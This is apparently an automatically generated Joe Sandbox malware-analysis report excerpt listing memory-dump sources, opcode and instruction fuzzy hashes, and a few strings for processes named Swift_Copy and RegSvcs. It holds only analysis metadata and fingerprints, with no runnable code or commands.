                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID: T+-q$[V~*$]\`
                            • API String ID: 0-3978741314
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:13.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:2
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q$LR]q
                            • API String ID: 0-3917262905
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            Memory Dump Source
                            • Source File: 00000007.00000002.2125328985.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_5dd0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 18c42517fb686ecdb06dc70f612f2c416a7eb0530eb5aa54c7fecd210c552813
                            • Instruction ID: ce1a84396e3cc95e9da1f098f107e0e24966e2103bb43b77cc35842bb816fbe3
                            • Opcode Fuzzy Hash: 18c42517fb686ecdb06dc70f612f2c416a7eb0530eb5aa54c7fecd210c552813
                            • Instruction Fuzzy Hash: 10410172E043598FCB14DFAAD8442EEFFB5EF89210F05856BD404A7241EB389985CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05DDE222), ref: 05DDE30F
                            Memory Dump Source
                            • Source File: 00000007.00000002.2125328985.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_5dd0000_RegSvcs.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID:
                            • API String ID: 1890195054-0
                            • Opcode ID: dde2f5279cd10f30d35e8b961cd2f1624ff0434c757118cba6f9037578ea228f
                            • Instruction ID: 14015d794ce32181125dc228e3065cde25ddcadb564f554563ffb88367e9ae14
                            • Opcode Fuzzy Hash: dde2f5279cd10f30d35e8b961cd2f1624ff0434c757118cba6f9037578ea228f
                            • Instruction Fuzzy Hash: 1211F2B1C006599BCB10DF9AC445AAEFBB8EF49310F10816AD918A7240D378A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: e0ff4f51da38b30c95623b00ca317f003bcd950aa882f3094596697fd7c443e4
                            • Instruction ID: c5751759e8156fd937430123be1848b87d9efd2ab25f828107be4540ac04d982
                            • Opcode Fuzzy Hash: e0ff4f51da38b30c95623b00ca317f003bcd950aa882f3094596697fd7c443e4
                            • Instruction Fuzzy Hash: 3431EE30B002068FDB19AF74D55066E7BB2AF88340F298539D40ADB395DE34DC4ACBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: c7765d3d667a0edd87ea3fef646000ea6ecffdc1c7995136a59e32e8459c8375
                            • Instruction ID: fe7b95e681ef98fa1a0f93abb60612eaf4f0fb4643163e5cfdec74b637f94d84
                            • Opcode Fuzzy Hash: c7765d3d667a0edd87ea3fef646000ea6ecffdc1c7995136a59e32e8459c8375
                            • Instruction Fuzzy Hash: F431ED30B002098FCB18AF38D55466F7BA6AF88740F298438D40ADB395EE34DC46CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: 42643c7dde908b8e471736f887c9a37b8abcac7f35c4710e9918ba419e0ad2fa
                            • Instruction ID: 2453ed7c8824925645eb736cb630ea446699bb6d91dab800f36cba640ee67b33
                            • Opcode Fuzzy Hash: 42643c7dde908b8e471736f887c9a37b8abcac7f35c4710e9918ba419e0ad2fa
                            • Instruction Fuzzy Hash: 95313A34E102099BDB18CFA4D4406EEB7B2EF95304F25C525EA06EB680EB71AD468B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: beb159e23ca530e18ef98474fd3b40a64effc84c7997fd338c1e7b67baf012dd
                            • Instruction ID: cfb503d2dd5fc495bc746a15a72036ce21b32c406a77206c99ead65b97e224e5
                            • Opcode Fuzzy Hash: beb159e23ca530e18ef98474fd3b40a64effc84c7997fd338c1e7b67baf012dd
                            • Instruction Fuzzy Hash: C511E9747092448FD716AF78D46452E7FB2EF8A300B0588EED085CB792DE355949C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fea21c7f6f3676ee136c48a33add2b7745d46ec85d66f3b7de81a859287a098e
                            • Instruction ID: 771ce23b777cb523d810e6ac033b039db55ce5a828df302417b9146173185e59
                            • Opcode Fuzzy Hash: fea21c7f6f3676ee136c48a33add2b7745d46ec85d66f3b7de81a859287a098e
                            • Instruction Fuzzy Hash: 7F124A347002069FCB1AAF38E44566D37A6FBC5300B288A79E109CB7A5DF75DD46CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba6862c14ca142d089bb276f8fddd51337bdc128e488c1830358dafc2cefef57
                            • Instruction ID: 9111d46c3da05bd95f50193d2cc1f087ed09b7e93a6a7c2bfc3511e79038683d
                            • Opcode Fuzzy Hash: ba6862c14ca142d089bb276f8fddd51337bdc128e488c1830358dafc2cefef57
                            • Instruction Fuzzy Hash: 41B15F70E0020D9FDF10CFA9D9857AEBBF1AF88314F19C129D919E7254EB749885CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0ee813ea00dc0295e3dcb99beb5a8a4d14a9990ef9642914b34ecbac54b6b33
                            • Instruction ID: 06e2db48e54405d1cd5ab480f50120012f7f8643df71ebdce2e0d5bc25646d3c
                            • Opcode Fuzzy Hash: c0ee813ea00dc0295e3dcb99beb5a8a4d14a9990ef9642914b34ecbac54b6b33
                            • Instruction Fuzzy Hash: AC915E34E001089FCB19DF68D594AADBBF2EF88310F158465E905EB3A5DB71EC42CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58c682ee390b5fc9add486845e122c9cf442310a745e46245e7d13731d7e0677
                            • Instruction ID: 686ab594e02a345799a3d1d7128b0cb15e707c969a7b17542fc45b9035768cdc
                            • Opcode Fuzzy Hash: 58c682ee390b5fc9add486845e122c9cf442310a745e46245e7d13731d7e0677
                            • Instruction Fuzzy Hash: 45915D70E0020DDFDF10CFA8D9857AEBBF1AF88314F158129E519A7254EB749986CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4a0cb0ed04f9ee4f0c98cbf22f4420095a67a9dd8152f0050a0710c12a55e429
                            • Instruction ID: 6d23795320e44e31b13efa41c21f782344966528b479aa12e620ea4b3fdd8087
                            • Opcode Fuzzy Hash: 4a0cb0ed04f9ee4f0c98cbf22f4420095a67a9dd8152f0050a0710c12a55e429
                            • Instruction Fuzzy Hash: 83716AB0E0024D9FDB10DFA9C9817AEBBF1EF88314F15C129E519A7254EB749842CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a45e4d20e3d8069d130a5fb25914eff93256899701faca38fda340ba374d9c3
                            • Instruction ID: 2849e1b1b205128890c75117e777e8b74132c80d4d4fd19b4c5cc766bd16784c
                            • Opcode Fuzzy Hash: 6a45e4d20e3d8069d130a5fb25914eff93256899701faca38fda340ba374d9c3
                            • Instruction Fuzzy Hash: BD716CB0E0024D9FDB14DFA9C8417AEBBF2AF88314F19C129E519A7254EB749841CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35424c38626edbead26f7cd80b11a5692f159757135f193b15c1c08b8673b437
                            • Instruction ID: 6080f40efd1a20bec69b520fe44986fc5eaefcb3170155961954294b66db60fe
                            • Opcode Fuzzy Hash: 35424c38626edbead26f7cd80b11a5692f159757135f193b15c1c08b8673b437
                            • Instruction Fuzzy Hash: 58513275E002188FDB14CFA9C885BADBBF1FF48304F19C029E819AB395D774A844CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a76cea93e87504194ecfa98ef166e780a985494c3dbc82edf63269c235c351f
                            • Instruction ID: f7f33210d11267b43a518259c784a444863adc02d7ff7f99be61c7a7b74ed020
                            • Opcode Fuzzy Hash: 0a76cea93e87504194ecfa98ef166e780a985494c3dbc82edf63269c235c351f
                            • Instruction Fuzzy Hash: 97512475E002188FDB14CFA9C845BADBBB1FF48304F19C119E919BB395D774A844CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 75cea1856fc2b8b873e7d682e83c54e4be9b0a27ea6845e211f510c467734b92
                            • Instruction ID: 5e51b53d4e10cd1bdf1b9219e8929a05fc2126ff6470214f07b1ed200e0c11e0
                            • Opcode Fuzzy Hash: 75cea1856fc2b8b873e7d682e83c54e4be9b0a27ea6845e211f510c467734b92
                            • Instruction Fuzzy Hash: 3E510C30146A438FCB0AEF28F9909563F65EBDA3043044AEDD0518B23EFBA46909DF71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 91ffa5797cad3b929809cc430bd38afbde206e8392a05c0d27aeb2cd5d18a8e5
                            • Instruction ID: cff883170684d7f19eab28d434619954be5023bc8f1d7433123583a18e43fb0e
                            • Opcode Fuzzy Hash: 91ffa5797cad3b929809cc430bd38afbde206e8392a05c0d27aeb2cd5d18a8e5
                            • Instruction Fuzzy Hash: A951AB31152A438FC70AEF28F9909463F65EBDA30470449E9D0559723DEBA46909DF71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fcb119f9a47e78ccde0436c2094512c9be48647dcb0ef891ce0e2f1f86e9a987
                            • Instruction ID: f1fed5a3ca27174eb132582c9c1e1855aea9757ef9692aa620fda4d7a0dac336
                            • Opcode Fuzzy Hash: fcb119f9a47e78ccde0436c2094512c9be48647dcb0ef891ce0e2f1f86e9a987
                            • Instruction Fuzzy Hash: 4C317235E0420A9BDB09CF65D4946AEBBF2EF89300F25C529E406E7350DBB0EC46CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 454a670cf3ca36b86d98d4f93b5eb1fd47c49f538e81a415e2f8287d84d07a76
                            • Instruction ID: 1296620f04de91b8828a94175ca375a03dc907b09b47342538e7d57ee8cd1d64
                            • Opcode Fuzzy Hash: 454a670cf3ca36b86d98d4f93b5eb1fd47c49f538e81a415e2f8287d84d07a76
                            • Instruction Fuzzy Hash: DE41DFB0D0034D9FDB14DFA9C484AEEBFB5FF48310F258429E509AB254DB75994ACBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16a1650fc4e3d25063589e3e7908ef12ef490c0274824e7560e79ed3f9bb461f
                            • Instruction ID: 3d79d132e396f2ab7a81972fc8b22c62b528fbb5aaaaa74e0c42b8dbe5c196a3
                            • Opcode Fuzzy Hash: 16a1650fc4e3d25063589e3e7908ef12ef490c0274824e7560e79ed3f9bb461f
                            • Instruction Fuzzy Hash: 52316B34A0020A9BCB09CFA5D4946AEBBF2EF89300F15C529E946E7350DFB0AC46CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: db482a968660044222d30391509380777b69e065a78e31080f6bbed828311369
                            • Instruction ID: 5e658e6b1a519efd4e9ad1151b5f6ec666f241aa45750e856a5c75a5c86259d0
                            • Opcode Fuzzy Hash: db482a968660044222d30391509380777b69e065a78e31080f6bbed828311369
                            • Instruction Fuzzy Hash: 1941EEB0D0024C9FDB14DFA9C484AEEBFB5FF48310F248429E909AB254DB75A945CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 00f827c0320b623e8af52ea03ae88c5c0f3fa3d1034440fac098d673a2ad339d
                            • Instruction ID: cc606eb461826237eae7c091ed37c01e60e24ee60061eba2a8c601fca7373429
                            • Opcode Fuzzy Hash: 00f827c0320b623e8af52ea03ae88c5c0f3fa3d1034440fac098d673a2ad339d
                            • Instruction Fuzzy Hash: 6731A031E0020A9BDF05DFA5D4A07AEFBB2FF89300F55C51AE905EB255DB709846CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8e681ba1496bf26322549bf7b0da9b7086701fd5ebf88f7f7ac9a2ff1a426b35
                            • Instruction ID: 58eace6b052961de530f0c08cd2297b9b44197a7f290d509187a752d2ff21417
                            • Opcode Fuzzy Hash: 8e681ba1496bf26322549bf7b0da9b7086701fd5ebf88f7f7ac9a2ff1a426b35
                            • Instruction Fuzzy Hash: F821C93C500506DFDF12EF24F844B693759EB55304F198A65D109C72A9FB74DC4ACBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 437aa67388476964962e5e3141c730f6100ba9adac1e3cd011e04a507c6375fa
                            • Instruction ID: 9880541189bf1b1eb0d48f4c300d360a4fe5507850241b44d02911057a6c7e79
                            • Opcode Fuzzy Hash: 437aa67388476964962e5e3141c730f6100ba9adac1e3cd011e04a507c6375fa
                            • Instruction Fuzzy Hash: 9C217E31E0020A9BDB05CFA5D4A07AEFBB2FF89300F55C519E905EB255DB70AC46CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4043c6dff4c72c5f1fd4feadc02faddad0e5c6a6c1c6595810e37ef364c3307
                            • Instruction ID: 5f2e872ec3fe7ea8a8f371fd6b9ae0b245f75f742f5d84e9704d851e08d5b052
                            • Opcode Fuzzy Hash: c4043c6dff4c72c5f1fd4feadc02faddad0e5c6a6c1c6595810e37ef364c3307
                            • Instruction Fuzzy Hash: BD21B230E0020A9BDB09CFA4D4947EEF7B2AF89304F25C62AE915FB340DB709946CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 882792bef30e2928d2738ad7dede3432598f9de14707c5abdde54dcd61991056
